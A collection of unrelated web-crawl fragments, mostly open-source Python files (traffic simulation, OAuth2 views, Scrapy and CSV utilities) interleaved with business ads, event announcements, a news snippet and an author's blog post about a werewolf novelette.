self.set_color(veh_id=veh_id, color=RED)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating rl vehicle colors:', e)
print(traceback.format_exc())
# color vehicles white if not observed and cyan if observed
for veh_id in self.get_human_ids():
try:
color = CYAN if veh_id in self.get_observed_ids() else WHITE
self.set_color(veh_id=veh_id, color=color)
except (FatalTraCIError, TraCIException) as e:
print('Error when updating human vehicle colors:', e)
print(traceback.format_exc())
# clear the list of observed vehicles
for veh_id in self.get_observed_ids():
self.remove_observed(veh_id)
def get_color(self, veh_id):
"""See parent class.
This does not pass the last term (i.e. transparency).
"""
r, g, b, t = self.kernel_api.vehicle.getColor(veh_id)
return r, g, b
def set_color(self, veh_id, color):
"""See parent class.
The last term for sumo (transparency) is set to 255.
"""
if self._color_vehicles:
r, g, b = color
self.kernel_api.vehicle.setColor(
vehID=veh_id, color=(r, g, b, 255))
def add(self, veh_id, type_id, edge, pos, lane, speed):
"""See parent class."""
if veh_id in self.master_kernel.scenario.rts:
# If the vehicle has its own route, use that route. This is used in
# the case of network templates.
route_id = 'route{}_0'.format(veh_id)
else:
num_routes = len(self.master_kernel.scenario.rts[edge])
frac = [val[1] for val in self.master_kernel.scenario.rts[edge]]
route_id = 'route{}_{}'.format(edge, np.random.choice(
[i for i in range(num_routes)], size=1, p=frac)[0])
self.kernel_api.vehicle.addFull(
veh_id,
route_id,
typeID=str(type_id),
departLane=str(lane),
departPos=str(pos),
departSpeed=str(speed))
def get_max_speed(self, veh_id, error=-1001):
"""See parent class."""
if isinstance(veh_id, (list, np.ndarray)):
return [self.get_max_speed(vehID, error) for vehID in veh_id]
return self.kernel_api.vehicle.getMaxSpeed(veh_id)
def set_max_speed(self, veh_id, max_speed):
"""See parent class."""
self.kernel_api.vehicle.setMaxSpeed(veh_id, max_speed)
|
Fantasea Bermuda offers the best local boat rentals! Book Eco-Express Today!
This powered catamaran is a unique vessel with an extremely shallow draft that can accommodate a wide variety of water based adventures-which means we can go just about anywhere! We can snorkel the outer reefs, visit hidden beaches, and transport our kayak safaris to remote coral gardens.
|
"""
Mock responses
"""
from httpretty import HTTPretty
from .stubdata.solr import example_solr_response
import json
class HTTPrettyMock(object):
"""
httpretty context manager scaffolding
"""
def __enter__(self):
HTTPretty.enable()
def __exit__(self, etype, value, traceback):
"""
:param etype: exit type
:param value: exit value
:param traceback: the traceback for the exit
"""
HTTPretty.reset()
HTTPretty.disable()
class MockSolrResponse(HTTPrettyMock):
"""
context manager that mocks a Solr response
"""
def __init__(self, api_endpoint):
"""
:param api_endpoint: name of the API end point
"""
self.api_endpoint = api_endpoint
def request_callback(request, uri, headers):
"""
:param request: HTTP request
:param uri: URI/URL to send the request
:param headers: header of the HTTP request
:return: httpretty response
"""
resp = json.loads(example_solr_response)
resp['responseHeader'] = {'params': request.parsed_body}
# Mimic the start, rows behaviour
rows = int(
request.parsed_body.get(
'rows', [len(resp['response']['docs'])]
)[0]
)
start = int(request.querystring.get('start', [0])[0])
try:
resp['response']['docs'] = resp['response']['docs'][start:start+rows]
except IndexError:
resp['response']['docs'] = resp['response']['docs'][start:]
# Mimic the filter "fl" behaviour
fl = request.parsed_body['fl'][0].split(',')
resp['response']['docs'] = [
{field: doc.get(field) for field in fl}
for doc in resp['response']['docs']
]
return 200, headers, json.dumps(resp)
HTTPretty.register_uri(
HTTPretty.POST,
self.api_endpoint,
body=request_callback,
content_type="application/json"
)
|
5 course white truffle dinner. This year, we have some exciting dishes Chef Michele designs that compliment well with the profile of white truffles. The 5 course dinner is food only and final price of $250/person does not include taxes and tips.
This ticket is a way to guarantee a seat at the event, your final bill will be the cost per person less the deposit collected here.
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 24 15:50:53 2015
@author: Niklas Bendixen
"""
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/topics/item-pipeline.html
from scrapy import signals # http://doc.scrapy.org/en/1.0/topics/signals.html
from scrapy.exporters import XmlItemExporter # http://doc.scrapy.org/en/1.0/topics/exporters.html#xmlitemexporter
class XmlExportPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
xml_name = str(spider.allowed_domains)
xml_name = xml_name[2:-2]
file = open('../../output/%s_crawled.xml' % xml_name, 'w+b')
self.files[spider] = file
self.exporter = XmlItemExporter(file, root_element = 'root', item_element = 'item')
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
file = self.files.pop(spider)
file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
|
Education: Receive individual coaching from experienced role models and mentors who are all active tour directors. The ITMI faculty provide you real-world, hands-on, practical applications in both the classroom and in the field. You will learn everything you need to know to begin living your dream as a tour director or guide.
Partnership: Over 8,000 alumni have built our reputation. Your success is our success. Our partnership with you extends for the life of your career and far beyond our job placement assistance, including access to the exclusive ITMI Alumni Portal for news and tools to help you to become more successful.
Community: You have now joined the world's largest network of Professional Tour Directors and Guides. Follow your colleagues via ITMI’s Facebook page, LinkedIn and Twitter and more to network, discuss issues and share your stories! Each year after graduation you are eligible to attend our 5-day Annual ITMI Symposium and Reunion, for continuing education, destination knowledge, networking opportunities with your colleagues and employment opportunities with a wide variety of ITMI Tour Operator partners.
Is Tour Guiding or Tour Directing Right for Me?
Once you apply to the International Tour Management Institute, we’ll schedule a no-obligations interview to learn more about each other and answer your questions about tour directing and us. Out of the large number of applicants who apply to ITMI, only a select few (20-25 students per class) are invited to attend our training program.
The most successful applicants are mature, interested and skilled in working with groups of people, and love traveling. ITMI’s goal is to equip you with the tools, individual attention, and direction you need to become a successful tour guide or tour director.
Think you’re too young or too old? To ITMI, your desire to make a difference in the world as an ambassador of goodwill is far more important than your age! You are not alone in wanting to travel and make a difference. You are important and your dreams are valued here.
What Does a Tour Guide or Tour Director Do?
Tour guiding and tour directing are dream careers that many people would love to have. What’s not to love about visiting exotic places and having once-in-a-lifetime experiences daily while making a great living? When people go on tours, they experience joy and fulfillment in their purest forms. Tour guides and tour directors connect with guests in deep, meaningful ways, and those guests recount those experiences for the rest of their lives. Likewise, all tour guides and tour directors have amazing stories of cherished moments with their guests on tour.
A tour guide may conduct walking tours, food & wine tours, regularly scheduled tours, and many more types. Tour guides provide local expertise and bring their cities to life! They may also work as travel staffers with local conventions and incentive travel bureaus. Some guides prefer to work only within their city, so they can do what they love and still go home at night to their family and friends.
Tour directors lead groups over the road. They’re also known as tour managers, adventure guides, course leaders, and tour escorts. They travel with the group throughout the tour, managing the details and enjoying the amazing sights and experiences. They may do this relatively close to home or halfway across the world – it all depends on the assignment. There are opportunities available to suit all preferences.
Do I have to choose between working as a tour guide or tour director?
No, not at all. Most graduates do both and enjoy a balance of home and away. The rewards of working as a tour guide or tour director are beyond measure. Making a difference in the world and in the lives of the people with whom you travel is mutually beneficial. Tour guides and tour directors educate and inspire their guests to discover new perspectives. They create bridges of understanding between people and cultures.
It’s time to bridge the gap between your passion and your career. Learn more about our 15-day Tour Guide / Director Certification Program. Ready to take the next step? Apply to ITMI today!
|
"""Views for django_oauth2_lite application."""
from django.shortcuts import render_to_response, get_object_or_404
from django_oauth2_lite.models import Client, scope_by_name, code_by_token, token_by_value,\
Scope, Token
from django_oauth2_lite.forms import CodeForm, ClientForm
from django.http import HttpResponseBadRequest, HttpResponse,\
HttpResponseRedirect
from django.utils import simplejson
from django_oauth2_lite.decorators import clientauth_required
from django.views.generic.list_detail import object_list
from django.contrib.auth.decorators import login_required
def _get(request,key,dflt=None):
if request.GET.has_key(key):
return request.GET[key]
else:
return dflt
def _post(request,key,dflt=None):
if request.POST.has_key(key):
return request.POST[key]
else:
return dflt
def response_dict(request,d):
if request.user.is_authenticated():
d['user'] = request.user
if request.user and hasattr(request.user,'get_profile'):
d['profile'] = request.user.get_profile()
return d
@login_required
def do_authorize(request,state,template_name):
client = get_object_or_404(Client,client_id=_get(request,'client_id'))
if _get(request,'response_type','code') != 'code':
return client.redirect({'error': 'unsupported_response_type','state': state})
code = client.new_authz_code(owner=request.user,state=state)
for n in _get(request,'scope',"").split(' '):
scope = scope_by_name(n)
if scope == None:
return client.redirect({'error': 'invalid_scope','state': state})
code.token.scopes.add(scope)
form = CodeForm(instance=code)
form.fields['code'].initial = code.token.value
return render_to_response(template_name,response_dict(request,{"form": form, 'client': code.token.client, 'scopes': code.token.scopes}))
def authorize(request,template_name='django_oauth2_lite/authorize.html'):
state = None
if request.REQUEST.has_key('state'):
state = request.REQUEST['state']
if request.method == 'POST':
form = CodeForm(request.POST)
if form.is_valid():
code = code_by_token(form.cleaned_data['code'])
if code == None:
return code.token.client.redirect({'state': state, 'error': 'invalid_request'})
if form.cleaned_data['authorized']:
code.authorized = True
code.save()
return code.token.client.redirect({'state': state,'code': code.token.value})
else:
code.token.delete()
code.delete()
return code.token.client.redirect({'error': 'access_denied','state': state})
else:
return code.token.client.redirect({'error': 'invalid_request','state': state})
else:
return do_authorize(request,state,template_name)
def json_response(data):
r = HttpResponse(simplejson.dumps(data),content_type='application/json')
r['Cache-Control'] = 'no-store'
r['Pragma'] = 'no-cache'
return r
def token_error(error):
return json_response({'error': error})
@clientauth_required
def token(request):
if not request.method == 'POST':
return HttpResponseBadRequest()
grant_type = _post(request,'grant_type')
at = None
if grant_type == 'authorization_code':
code = code_by_token(_post(request,'code'))
if not code:
return token_error('invalid_grant')
if not code.is_valid():
if code.token:
if code.token.refresh_token:
code.token.refresh_token.delete()
code.token.delete()
code.delete()
return token_error('invalid_grant')
at = code.new_access_token()
elif grant_type == 'refresh_token':
rt = token_by_value(_post(request,'refresh_token'))
if not rt:
return token_error('invalid_grant')
if not rt.is_valid():
rt.delete()
return token_error('invalid_grant')
## TODO: scope is silently ignored right now - should honor request to narrow scope
at = rt.client.new_access_token(rt.owner, refresh_token=rt)
else:
return token_error('unsupported_grant_type')
return json_response({'access_token': at.value,
'token_type': at.type(),
'expires_in': 3600,
'refresh_token': at.refresh_token.value})
@login_required
def clients(request,template_name='django_oauth2_lite/clients.html'):
queryset = Client.objects.filter(owner=request.user)
return object_list(request,
template_object_name='client',
queryset=queryset,
template_name=template_name)
@login_required
def tokens(request,template_name='django_oauth2_lite/tokens.html'):
queryset = Token.objects.filter(owner=request.user,refresh_token=None)
return object_list(request,
template_object_name='token',
queryset=queryset,
template_name=template_name)
@login_required
def add_client(request,template_name="django_oauth2_lite/client_form.html"):
if request.method == 'POST':
client = Client(owner=request.user)
form = ClientForm(request.POST,request.FILES,instance=client)
if form.is_valid():
form.save()
return HttpResponseRedirect("../clients")
else:
form = ClientForm()
return render_to_response(template_name,response_dict(request,{'form': form}))
@login_required
def remove_client(request,id):
client = get_object_or_404(Client,id=id)
if client:
client.delete()
return HttpResponseRedirect("../../clients")
@login_required
def remove_token(request,id):
token = get_object_or_404(Token,id=id)
if token:
token.delete()
return HttpResponseRedirect("../../tokens")
# Manage scopes in the admin view
def callback(request,template_name="django_oauth2_lite/callback.html"):
return render_to_response(template_name,response_dict(request,{'error': _get(request,'error'),
'state': _get(request,'state'),
'code': _get(request,'code')}))
@login_required
def test_client(request,id,template_name='django_oauth2_lite/test.html'):
client = get_object_or_404(Client,id=id)
return render_to_response(template_name,response_dict(request,{'client': client,'scopes': Scope.objects.all()}))
@login_required
def scopes(request,template_name='django_oauth2_lite/scopes.html'):
queryset = Scope.objects.all()
return object_list(request,
template_object_name='scope',
queryset=queryset,
template_name=template_name)
|
AAAnd the Oscar goes toooo ... ? This year we are going to celebrate a Hollywood & Movies party. Every year we invite all Agile Testing Days participants to a big social event in a relaxed atmosphere, paired with delicious food and an entertainment program. This evening is all about fun, networking and dancing. Since 2011, we have honored the Most Influential Agile Testing Professional Person (MIATPP) of the year in a lavish awards ceremony.
This year’s dress code: glamour, glitter, movie hero costumes, movie or TV characters, Hollywood outfits or accessoires, from Marilyn Monroe to Steven Spielberg over to Rambo or Pennywise!
After a good and proper Oktoberfest in 2010, a spooky Halloween Party in 2013, a crazy Carnival Night in 2014, a really wild “Wild Wild West” party in 2015, a "Ho-Ho-Holy", but not Silent Night in 2016 and a FUNTESTIC Super Hero Night last year, it is already a tradition to masquerade during the MIATPP Award Night!
Don’t miss our exciting party and please make sure to get dressed in a costume or to wear at least some funny accessories. During the online registration process make sure to mark the check box for the social event to participate for free. Seats are limited to only 400! On the day of the event you will receive your ticket for the Social Event at the registration booth!
Please note: we are giving away free conference tickets for the best costumes as we did in 2013, 2014, 2015, 2016 & 2017!
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2010-2012 Asidev s.r.l.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from aybu.manager.models.validators import (validate_hostname,
check_domain_not_used)
from aybu.manager.exc import ParamsError
from aybu.manager.models import (Instance,
Redirect)
from pyramid.view import view_config
from sqlalchemy.orm.exc import NoResultFound
@view_config(route_name='redirects', request_method=('HEAD', 'GET'))
def list(context, request):
return {r.source: r.to_dict() for r in Redirect.all(request.db_session)}
@view_config(route_name='redirects', request_method='POST',
renderer='taskresponse')
def create(context, request):
try:
source = validate_hostname(request.params['source'])
instance = Instance.get_by_domain(request.db_session,
request.params['destination'])
http_code = request.params.get('http_code', 301)
target_path = request.params.get('target_path', '')
check_domain_not_used(request, source)
except KeyError as e:
raise ParamsError(e)
except NoResultFound:
raise ParamsError('No instance for domain {}'\
.format(request.params['destination']))
else:
params = dict(source=source, instance_id=instance.id,
http_code=http_code, target_path=target_path)
return request.submit_task('redirect.create', **params)
@view_config(route_name='redirect', request_method=('HEAD', 'GET'))
def info(context, request):
return Redirect.get(request.db_session,
request.matchdict['source']).to_dict()
@view_config(route_name='redirect', request_method='DELETE',
renderer='taskresponse')
def delete(context, request):
source = request.matchdict['source']
Redirect.get(request.db_session, source)
return request.submit_task('redirect.delete', source=source)
@view_config(route_name='redirect', request_method='PUT',
renderer='taskresponse')
def update(context, request):
params = dict()
source = request.matchdict['source']
Redirect.get(request.db_session, source)
specs = (
('new_source', check_domain_not_used, [request]),
('destination', Instance.get_by_domain, [request.db_session]),
('http_code', None, None),
('target_path', None, None)
)
try:
for attr, validate_fun, fun_args in specs:
if attr in request.params:
if validate_fun:
fun_args.append(request.params[attr])
params[attr] = validate_fun(*fun_args)
else:
params[attr] = request.params[attr]
except NoResultFound:
raise ParamsError("No instance for domain {}"\
.format(request.params['destination']))
if not params:
raise ParamsError("Missing update fields")
params['source'] = source
if "destination" in params:
params['instance_id'] = params['destination'].id
del params['destination']
if "new_source" in params:
params['new_source'] = validate_hostname(params['new_source'])
return request.submit_task('redirect.update', **params)
|
Are you ready to do some exploring? This elixir supports a meditation practice that aims for astral projection, dream walking, and communication with the divine. Excellent for ritual and divination work. May also be used to stimulate sleep and enhance dreaming.
As a stone of connectivity, Moldavite gem essence carries an intense frequency, a fusion of earthly and extraterrestrial energies that are quickly felt, often dramatically in those who resonate with its power. It is a wonderful essence for connecting to your light-self and moving through the veil. Angel's Trumpet flower essence allows one to feel a kind of spiritual surrender, opening the heart to the spiritual world. An excellent flower essence for moving through transformative rebirthing processes, it facilitates profound soul opening.
Ingredients: Mount Shasta spring water, Moldevite gem essence, Angel's trumpet (Datura) flower essence, Mugwort, Fennel, Lavender, Valerian root, Alcohol, Local honey.
* A typical dose of 30 drops in water or under the tongue, depending on age, weight, and sensitivity someone may find more or less to work for them.
|
from django.http import HttpResponse, HttpRequest
from django.utils.translation import ugettext as _
from typing import List, Text
from zerver.context_processors import get_realm_from_request
from zerver.lib.actions import check_add_user_group, do_update_user_group_name, \
do_update_user_group_description, bulk_add_members_to_user_group, \
remove_members_from_user_group, check_delete_user_group
from zerver.lib.exceptions import JsonableError
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.lib.users import user_ids_to_users
from zerver.lib.validator import check_list, check_string, check_int, \
check_short_string
from zerver.lib.user_groups import access_user_group_by_id, get_memberships_of_users
from zerver.models import UserProfile, UserGroup, UserGroupMembership
from zerver.views.streams import compose_views, FuncKwargPair
@has_request_variables
def add_user_group(request, user_profile,
name=REQ(),
members=REQ(validator=check_list(check_int), default=[]),
description=REQ()):
# type: (HttpRequest, UserProfile, Text, List[int], Text) -> HttpResponse
user_profiles = user_ids_to_users(members, user_profile.realm)
check_add_user_group(user_profile.realm, name, user_profiles, description)
return json_success()
@has_request_variables
def edit_user_group(request, user_profile,
user_group_id=REQ(validator=check_int),
name=REQ(default=""), description=REQ(default="")):
# type: (HttpRequest, UserProfile, int, Text, Text) -> HttpResponse
if not (name or description):
return json_error(_("No new data supplied"))
user_group = access_user_group_by_id(user_group_id, realm=user_profile.realm)
result = {}
if name != user_group.name:
do_update_user_group_name(user_group, name)
result['name'] = _("Name successfully updated.")
if description != user_group.description:
do_update_user_group_description(user_group, description)
result['description'] = _("Description successfully updated.")
return json_success(result)
@has_request_variables
def delete_user_group(request: HttpRequest, user_profile: UserProfile,
user_group_id: int=REQ(validator=check_int)) -> HttpResponse:
check_delete_user_group(user_group_id, user_profile.realm)
return json_success()
@has_request_variables
def update_user_group_backend(request, user_profile,
user_group_id=REQ(validator=check_int),
delete=REQ(validator=check_list(check_int), default=[]),
add=REQ(validator=check_list(check_int), default=[])):
# type: (HttpRequest, UserProfile, int, List[int], List[int]) -> HttpResponse
if not add and not delete:
return json_error(_('Nothing to do. Specify at least one of "add" or "delete".'))
method_kwarg_pairs = [
(add_members_to_group_backend,
dict(user_group_id=user_group_id, members=add)),
(remove_members_from_group_backend,
dict(user_group_id=user_group_id, members=delete))
] # type: List[FuncKwargPair]
return compose_views(request, user_profile, method_kwarg_pairs)
def add_members_to_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
user_profiles = user_ids_to_users(members, user_profile.realm)
existing_member_ids = set(get_memberships_of_users(user_group, user_profiles))
for user_profile in user_profiles:
if user_profile.id in existing_member_ids:
raise JsonableError(_("User %s is already a member of this group" % (user_profile.id,)))
bulk_add_members_to_user_group(user_group, user_profiles)
return json_success()
def remove_members_from_group_backend(request: HttpRequest, user_profile: UserProfile,
user_group_id: int, members: List[int]) -> HttpResponse:
if not members:
return json_success()
user_profiles = user_ids_to_users(members, user_profile.realm)
user_group = access_user_group_by_id(user_group_id, user_profile.realm)
remove_members_from_user_group(user_group, user_profiles)
return json_success()
|
North Korea's Vice Foreign Minister has blamed President Donald Trump for 'making trouble' through his 'aggressive tweets' as tensions rise over the possibility the regime will launch another nuclear weapons test.
Vice Minister Han Song Ryol sat down for an interview with the Associated Press on the eve of the country's biggest national holiday, the 'Day of the Sun' amid increasingly bitter words between the two countries.
His remarks come hours after a member of the Trump administration denied a report claiming the US was prepared to launch a pre-emptive strike to halt any nuclear test at the weekend.
North Korea blames Trump and the U.S. for the rising tensions, according to Han, who cited US-South Korean wargames, the deployment of a US aircraft carrier to the peninsula last weekend, as well as Trump's recent tweets on Tuesday that the North is 'looking for trouble'.
|
#!/usr/bin/env python
"""
clim.py
ROMS climatology utilities
Written by Brian Powell on 08/15/15
Copyright (c)2017 University of Hawaii under the BSD-License.
"""
import seapy
import numpy as np
import netCDF4
clim_times = ('zeta_time', 'v2d_time', 'v3d_time', 'temp_time', 'salt_time')
def gen_bry_clim(clim_file, grid, bry):
"""
Taking the results of gen_ncks and interpolation, stitch together
climatology files that were interpolated using only the boundary regions
into a single climatology (with no data where interpolation wasn't
performed).
Parameters
----------
clim_file: str,
The name of the output climate file
grid: seapy.model.grid or str,
The output ROMS grid
bry: dict,
A dictionary prescribing the climatology file interpolated for each
boundary side.
{"west":filename, "south":filename}, ...}
Returns
-------
None
"""
grid = seapy.model.asgrid(grid)
# Grab the first dictionary record and use it to determine the number
# of times in the new climatology file
nc = netCDF4.Dataset(bry[list(bry.keys())[0]])
reftime, time = seapy.roms.get_reftime(nc)
times = nc.variables[time][:]
nc.close()
# Create the new climatology file
ncout = seapy.roms.ncgen.create_clim(clim_file,
eta_rho=grid.ln, xi_rho=grid.lm, s_rho=grid.n,
ntimes=len(times), reftime=reftime,
title="stitched from boundary interpolation")
ncout.variables["clim_time"][:] = times
for side in bry:
if bry[side] is None:
continue
ncin = netCDF4.Dataset(bry[side])
for fld in seapy.roms.fields:
idx = [np.s_[:] for i in range(seapy.roms.fields[fld]["dims"] + 1)]
dat = ncin.variables[fld][:]
shp = dat.shape
if side == "west":
idx[-1] = np.s_[:shp[-1]]
pass
elif side == "east":
idx[-1] = np.s_[-shp[-1]:]
pass
elif side == "north":
idx[-2] = np.s_[-shp[-2]:]
pass
elif side == "south":
idx[-2] = np.s_[:shp[-2]]
pass
ncout.variables[fld][idx] = dat
ncout.sync()
ncin.close()
ncout.close()
|
After a family trip to Seaside Heights, we had some fun going by the “Shore Store” and “The House”. We even saw the rhinestone glasses at the Shore Store. Enjoy!
|
# ============================================================================
# FILE: chromatica.py
# AUTHOR: Yanfei Guo <yanf.guo at gmail.com>
# License: MIT license
# ============================================================================
import pynvim
from chromatica import logger
from chromatica.chromatica import Chromatica
import chromatica.util as util
import time
@pynvim.plugin
class ChromaticaPlugin(object):
def __init__(self, vim):
self.__vim = vim
util.use_vim(vim)
@pynvim.function("_chromatica", sync=True)
def init_chromatica(self, args):
self.__chromatica = Chromatica(self.__vim)
self.__vim.vars["chromatica#_channel_id"] = self.__vim.channel_id
@pynvim.rpc_export('chromatica_enable_logging', sync=True)
def enable_logging(self, level, logfile):
if not self.__chromatica.debug_enabled:
logger.setup(self.__vim, level, logfile)
self.__chromatica.debug_enabled = True
self.__chromatica.dump_debug_info()
@pynvim.rpc_export("chromatica_highlight")
def highlight(self, context):
context["rpc"] = "chromatica_highlight"
try:
self.__chromatica.highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_parse")
def parse(self, context):
context["rpc"] = "chromatica_parse"
try:
self.__chromatica.parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_delayed_parse")
def delayed_parse(self, context):
context["rpc"] = "chromatica_delayed_parse"
try:
self.__chromatica.delayed_parse(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_print_highlight")
def print_highlight(self, context):
context["rpc"] = "chromatica_print_highlight"
try:
self.__chromatica.print_highlight(context)
except:
self.__chromatica.debug(context)
raise
@pynvim.rpc_export("chromatica_clear_highlight")
def clear_highlight(self):
self.__chromatica.clear_highlight()
@pynvim.rpc_export("chromatica_show_info", sync=True)
def show_info(self, context):
self.__chromatica.show_info(context)
|
April Connors is an Illustrator and Visual Development artist based in Los Angeles. She has also taught at Walt Disney Animation Studios, Gnomon School of Visual Effects, 3Kicks Fine Art Studio and Otis College of Art and Design. April has exhibited her works in a number of countries including Hong Kong, Mexico and the United States. Her work is traditional and dynamic in nature, also holding experience in Fashion Illustration. April has studied at the Concept Design Academy, 3Kicks Art Studio, and Art Center at Night.
|
class Loki:
@staticmethod
def printf(x):
print(x)
@staticmethod
def plus(*args):
return reduce((lambda x, y : x + y), args)
@staticmethod
def minus(*args):
return reduce((lambda x, y : x - y), args)
@staticmethod
def div(*args):
return reduce((lambda x, y : x / y), args)
@staticmethod
def mult(*args):
return reduce((lambda x, y : x * y), args)
@staticmethod
def and_(*args):
return reduce((lambda x, y : x and y), args)
@staticmethod
def or_(*args):
return reduce((lambda x, y : x or y), args)
@staticmethod
def eq(*args):
return not not reduce((lambda x, y : x if x == y else False), args)
@staticmethod
def neq(*args):
return not Loki.eq(*args)
@staticmethod
def lt(*args):
return not not reduce((lambda x, y : y if x < y else False), args)
@staticmethod
def lte(*args):
return not not reduce((lambda x, y : y if x <= y else False), args)
@staticmethod
def gt(*args):
return not not reduce((lambda x, y : y if x > y else False), args)
@staticmethod
def gte(*args):
return not Loki.lt(*args)
@staticmethod
def mod(x, y):
return x % y
@staticmethod
def range(n):
return range(n)
@staticmethod
def get(e, i):
return e[i]
@staticmethod
def set(x, v):
x = v
@staticmethod
def assoc(x, i, v):
x[i] = v
return x
@staticmethod
def in_(x, l):
return (x in l)
@staticmethod
def sc(n, x, l):
return n[x:l]
@staticmethod
def dc(n, x, l):
return n[x::l]
@staticmethod
def dcm(n, x, m, l):
return n[x:m:l]
@staticmethod
def not_ (x):
return not x
#END LOKI HELPER FUNCTIONS
Loki.printf("TODO QUOTED")
Loki.printf("py")
(Loki.printf("print this!") if Loki.lt(1, 2) else Loki.printf("do not print this!"))
x = 5
(Loki.printf("this is wrong") if Loki.gt(x, 10) else Loki.printf("this is right"))
for x in Loki.range(3):
Loki.printf(x)
for x in Loki.range(3):
Loki.printf("x")
Loki.printf(x)
for y in Loki.range(3):
Loki.printf("y")
Loki.printf(y)
Loki.printf(x)
x = 7
Loki.printf(x)
class Rocket():
def __init__(self, x):
self.speed = x
color = "red"
fuel = 7
def lift_off (self):
return Loki.printf(Loki.plus("I'm flying @ ", (self.speed() if callable(self.speed) else self.speed), " speed"))
def toString (self):
return Loki.plus("I'm a ", (self.color() if callable(self.color) else self.color), " rocket")
r = Rocket(7)
Loki.printf((r.speed() if callable(r.speed) else r.speed))
r.speed = 10
Loki.printf((r.speed() if callable(r.speed) else r.speed))
|
Pack, the werewolf romance novelette that I originally wrote back in 2008 for the Mammoth Book of Paranormal Romance anthology, is now available as a single ebook for only $1.99.
Marlee Peters is tired of putting her dreams on hold, so when her friends can’t continue on a long- anticipated hike of Yellowstone National Park, she goes on without them. But Marlee isn’t alone in the woods; she’s being hunted by a pack of frighteningly intelligent wolves. When a fight for survival takes an impossible turn, Marlee realizes that the enigmatic stranger who saves her might either be her dream come true…or her waking nightmare.
Order at: Amazon, B&N, iBooks , Kobo.
As I said, back in early 2008, I wrote a werewolf romance story called Pack for the Mammoth Book Of Paranormal Romance anthology. Later, Pack was re-published with authors Ilona Andrews and Meljean Brook in an e-book-only anthology called Under Her Skin. In the years since, Meljean, Ilona, and I have dipped more into self-publishing, so we decided to break up the anthology and self-publish our stories as individual novelettes instead. While I was rereading Pack in preparation of this, I made some scene additions to add depth to the characters’ thoughts, motivations, and feelings. You see, the old anthology that I’d written this for had a word-count limit that I’d already far exceeded, so I’d left those things out in the previously-published versions. Then, I posted it for free on my website blog for a limited time as a gift to my readers. Since then – proving that I cannot stop tinkering with a story unless deadlines force me to – I also added more content in the form of additional scene tweaks as well as an entire new chapter featuring a love scene between Marlee and Daniel. I’m so pleased that re-publishing this story on its own allowed me to add this additional material, because the end result is over twenty percent more content in this version versus the previously-published editions, and – I believe – a better story overall.
I hope you enjoy Pack, whether this is your first time reading it, or whether you read it before in an earlier version.
Audio readers: I am trying to get this out in audio, too. More to come on that.
Want to get reminded about new releases, special sales and personal appearances in your city? Sign up for Jeaniene’s newsletter!
This is my second time reading Pack in Under Her Skin. I find myself looking forward to buying the new book so I can read more. I would love to read about how Marlee did through her change and first year or two as a werewolf.
I definitely feel Pack would be a great first book for a series and I haven’t even read the republished version yet.
I loved the novelette pack. Are you hopefully going to continue it?
Thank you! One day, I’d like to expand on the world and write another werewolf novel, but at this time, I have no plans to continue Marlee and Daniel’s story. I loved writing about them, but I can’t turn everything I write into a series ;).
I have read everything you’ve written…thank you for the Pack…teaser….we want more Jeaniene! Looking forward to meeting up with Vlad again…I miss Kat and Bones too. Ivy’s story was dark, but I’m going to re-read it before the next book arrives….can’t wait!
Is this a appropriate book? I haven’t read it yet but my parents are skeptical about it. I am only 13 but I love all books. Please reply soon.
I do NOT recommend this story for anyone under 18. It contains very adult material. I do recommend Wicked Lovely by Melissa Marr, Raised By Wolves by Jennifer Lynn Barnes, and Darkest Powers by Kelley Armstrong.
Please continue Daniel and Marlee’s story! What a cliffhanger! AGH!
Are you going to do a series with Marilee and Daniel????
Probably not. Sometimes, I have to write a one-and-done :).
Great story, I really enjoyed it!
|
#!/usr/bin/env python3.4
# ---------------------------------------------------------------------------- #
import csv, os, glob
from Constants import *
from tqdm import tqdm
# ---------------------------------------------------------------------------- #
os.chdir('../../../../Desktop/')
CSVFiles = glob.glob('*.csv')
# ---------------------------------------------------------------------------- #
# Re-Map Column Fields
def ReMapHeaderFields():
for index in tqdm(range(0,len(CSVFiles))):
with open(CSVFiles[index],'rU') as InputFile,\
open('___ReMapped--' + str(CSVFiles[index]),'at') as OutputFile:
Input = csv.reader(InputFile)
Output = csv.writer(OutputFile)
Output.writerow(HeaderRowMain)
FirstLine = True
for line in tqdm(Input):
if FirstLine:
for IndexA in range(0,len(line)):
MatchHeaderFields(line[IndexA], IndexA)
FirstLine = False
else:
Newline = []
for IndexB in range(0,len(HeaderRowMain)):
if IndexB in HeaderDict:
Newline.append(eval(HeaderDict[IndexB]))
else:
Newline.append('')
Output.writerow(Newline)
def MultiFileMarge():
FirstFileUseHeaderRow = True
CSVFiles = glob.glob('___*.csv')
for line in tqdm(CSVFiles):
with open(line,'rU') as File,\
open('>>>> MERGED_FILE <<<<.csv','at') as Merge:
OutputClean = csv.writer(Merge)
Input = csv.reader(File)
if FirstFileUseHeaderRow:
for line in tqdm(Input):
OutputClean.writerow(line)
FirstFileUseHeaderRow = False
else:
next(File)
for line in tqdm(Input):
OutputClean.writerow(line)
# ---------------------------------------------------------------------------- #
if __name__ == '__main__':
print('=======================================')
print(' RE-MAP & MERGE ')
